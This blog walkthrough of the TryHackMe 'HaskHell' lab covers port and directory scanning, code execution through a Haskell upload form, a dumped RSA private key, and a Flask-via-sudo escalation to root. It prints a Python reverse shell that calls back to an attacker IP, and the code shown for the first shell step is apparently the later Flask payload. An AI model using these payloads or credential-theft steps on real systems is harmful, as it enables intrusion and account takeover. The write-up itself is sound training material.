This page looks best with JavaScript enabled

TryHackMe: Hashkell

 ·  ☕ 4 min read

Enumeration

root@osboxes:~/Documents/haskell# cat scan.txt 
[*] OS based on TTL
Linux
[*] TCP Scan
Open ports: 22,5001
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1d:f3:53:f7:6d:5b:a1:d4:84:51:0d:dd:66:40:4d:90 (RSA)
|   256 26:7c:bd:33:8f:bf:09:ac:9e:e3:d3:0a:c3:34:bc:14 (ECDSA)
|_  256 d5:fb:55:a0:fd:e8:e1🆎9e:46:af:b8:71:90:00:26 (ED25519)
5001/tcp open  http    Gunicorn 19.7.1
|_http-server-header: gunicorn/19.7.1
|_http-title: Homepage
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
	 TTL: 0
	 Furious: 26
	 Nmap: 31
	 Total: 57

The web look like this:

Web interface

Opened the homework link:

Web homework

It seems that there may be some url to upload Hashkell code, then the web compiles it and executes it.

Enumerated hidden ports with dirsearch and as I expected:

root@osboxes:~/Downloads/dirsearch# python3 dirsearch.py -E -u http://10.10.132.211:5001

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions:  | HTTP method: getSuffixes: php, asp, aspx, jsp, js, do, action, html, json, yml, yaml, xml, cfg, bak, txt, md, sql, zip, tar.gz, tgz | HTTP method: get | Threads: 10 | Wordlist size: 6487 | Request count: 6487

Error Log: /root/Downloads/dirsearch/logs/errors-20-08-01_17-15-01.log

Target: http://10.10.132.211:5001

Output File: /root/Downloads/dirsearch/reports/10.10.132.211/20-08-01_17-15-01

[17:15:01] Starting: 
[17:15:31] 500 -  291B  - /uploads/dump.sql
[17:16:12] 200 -  237B  - /submit

Task Completed

Checked the submit webpage:

Upload file

Intrussion:

First of all checked both if it has python installed (to execute a reverse shell) and if I can execute system commands:

1
2
3
4
5
module Main where

import System.Process

main = callCommand "which python || which python3"

Got the following output:

[1 of 1] Compiling Main             ( /home/flask/uploads/exec.hs, /home/flask/uploads/exec.o )
Linking /home/flask/uploads/exec ...
/usr/bin/python

As both python and the payload worked then executed a reverse shell:

import socket,subprocess,os
from flask import Flask
app = Flask(__name__)

@app.route('/')
def home():
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("10.9.31.216",1212))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    p = subprocess.call(["/bin/sh","-i"])
    return "You just got pwned!"

if __name__ == '__main__':
    app.run(debug=True)

Logged in as flask we can read the user flag:

flask@haskhell:~$ find / -name user.txt 2>/dev/null
/home/prof/user.txt
flask@haskhell:~$ ls -l /home/prof/user.txt
-rw-r--r-- 1 root root 26 May 27 19:06 /home/prof/user.txt

Privesc:

Doing enumeration found an ssh private key:

flask@haskhell:~$ find / -name id_rsa 2>/dev/null
/home/prof/.ssh/id_rsa
flask@haskhell:~$ cat /home/prof/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA068E6x8/vMcUcitx9zXoWsF8WjmBB04VgGklNQCSEHtzA9cr
94rYpUPcxxxYyw/dAii0W6srQuRCAbQxO5Di+tv9aWXmBGMEt0/3tOE7D09RhZGQ
b68lAFDjSSJaVlVzPi+waotyP2ccVJDjXkwK0KIm6RsACIOhM9GtI2wyZ6vOg4ss
Nb+7UY60iOkcOAWP09Omzjc2q7hcE6CuV6f7+iObamfGlZ4QQ5IvUj0etStDD6iU
WQX4vYewYqUz8bedccFvpC6uP2FGvDONYXrLWWua7wlwSgOqeXXxkG7fxVqYY2++
6ZVm8RE7TpPNxsQNDwpnxOiwTxGMgCrIMxgRVwIDAQABAoIBAQCTLXbf+wQXvtrq
XmaImQSKRUiuepjJeXLdqz1hUpo7t3lKTEqXfAQRM9PG5GCgHtFs9NwheCtGAOob
wSsR3TTTci0JIP4CQs4+nez96DNl+6IUmhawcDfrtlGwwZ/JsvPDYujnyziN+KTr
7ykGoRxL3tHq9Qja4posKzaUEGAjTz8NwrhzB6xatsmcWBV0fFoWzpS/xWzW3i7F
gAoYxc6+4s5bKHsJima2Aj5F3XtHfipkMdBvbl+sjGllgiQn/oEjYMIX5wc7+se2
o7FERO2oy3I5jUOlULsr9BwQpNFA2Qenc4Wc7ghb0LfCVaUs/RHQ7IQ4F3yp/G67
54oLue6hAoGBAPCe+WsnOXzhwQ9WXglhfztDR1lcwSFMeHZpcxYUVqmVEi2ZMLll
B67SCri9lHHyvBtrH7YmZO5Q9UcGXdLCZGmbkJUdX2bjqV0zwwx1qOiVY8LPnZSJ
LJN+0p1dRHsO3n4vTHO8mVuiM5THi6pcgzSTggIhS+e1ks7nlQKiBuD/AoGBAOE2
kwAMtvI03JlkjvOHsN5IhMbOXP0zaRSrKZArDCcqDojDL/AQltQkkLtQPdUPJgdY
3gOkUJ2BCHNlIsAtUjrTj+T76N512rO2sSidOEXRDCc+g/QwdgENiq/w9JroeWFc
g9qM3f2cl/EkjxRgiyuTfK6mbzcuMSveX4LfCXepAoGAd2MZc+4ZWvoUNUzwCY2D
eF8QVqlr9d6gYng9rvXWbfvV8iPxBfu3zSjQQwtlTQhYBu6m5FS2fXxTxrLE+J6U
/cU+/o19WWqaDPFy1IrIjOYagn1KvXk2UdR6IbQ2FyywfkFvmHk6Sjn3h9leVd/j
BcIunmnw5H214s0KpSzJZvcCgYA5Ca9VNeMnmIe+OZ+Swezjfw5Ro3YdkmWsnGTc
ZGqhiJ9Bt91uOWVZuSEGr53ZVgrVlYY0+eqI2WMghp60eUX4LBinb71cihCnrz9S
/+5+kCE51zVoJNXeEmXrhWUNzo7fP6UNNtwKHRzGL/IkwQa+NI5BVVmZahN9/sXF
yWMGcQKBgQDheyI7eKTDMsrEXwMUpl5aiwWPKJ0gY/2hS0WO3XGQtx6HBwg6jJKw
MMn8PNqYKF3DWex59PYiy5ZL1pUG2Y+iadGfIbStSZzN4nItF5+yC42Q2wlhtwgt
i4MU8bepL/GTMgaiR8RmU2qY7wRxfK2Yd+8+GDuzLPEoS7ONNjLhNA==
-----END RSA PRIVATE KEY-----

Used it to connect through ssh:

root@osboxes:~/Documents/haskell# chmod 600 id_rsa 
root@osboxes:~/Documents/haskell# ssh -i id_rsa prof@10.10.159.239
load pubkey "id_rsa": invalid format
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Aug  2 00:04:41 UTC 2020

  System load:  0.0                Processes:           99
  Usage of /:   26.3% of 19.56GB   Users logged in:     0
  Memory usage: 69%                IP address for eth0: 10.10.159.239
  Swap usage:   0%


39 packages can be updated.
0 updates are security updates.


Last login: Wed May 27 18:45:06 2020 from 192.168.126.128
$ 

Upgraded the tty and listed sudo perms:

prof@haskhell:~$ sudo -l
Matching Defaults entries for prof on haskhell:
    env_reset, env_keep+=FLASK_APP, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User prof may run the following commands on haskhell:
    (root) NOPASSWD: /usr/bin/flask run

Created a payload flask app:

prof@haskhell:~$ cat flask_reverse.py 
import socket,subprocess,os
from flask import Flask
app = Flask(__name__)

@app.route('/')
def home():
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("10.9.31.216",1212))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    p = subprocess.call(["/bin/sh","-i"])
    return "You just got pwned!"

if __name__ == '__main__':
    app.run(debug=True)

Then tried running it with sudo but got the following error:

prof@haskhell:~$ sudo /usr/bin/flask run
Usage: flask run [OPTIONS]

Error: Could not locate Flask application. You did not provide the FLASK_APP environment variable.

For more information see http://flask.pocoo.org/docs/latest/quickstart/

So had to export the variable before running:

prof@haskhell:~$ export FLASK_APP=flask_reverse.py
prof@haskhell:~$ sudo /usr/bin/flask run
 * Serving Flask app "flask_reverse"
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

Then on another console listened on port 1212 and made a request to the malicious flask web to get root:

root@osboxes:~/Documents/haskell# rlwrap nc -lvnp 1212
listening on [any] 1212 ...
connect to [10.9.31.216] from (UNKNOWN) [10.10.159.239] 37094
# id
uid=0(root) gid=0(root) groups=0(root)

Resources

Share on

ITasahobby
WRITTEN BY
ITasahobby
InTernet lover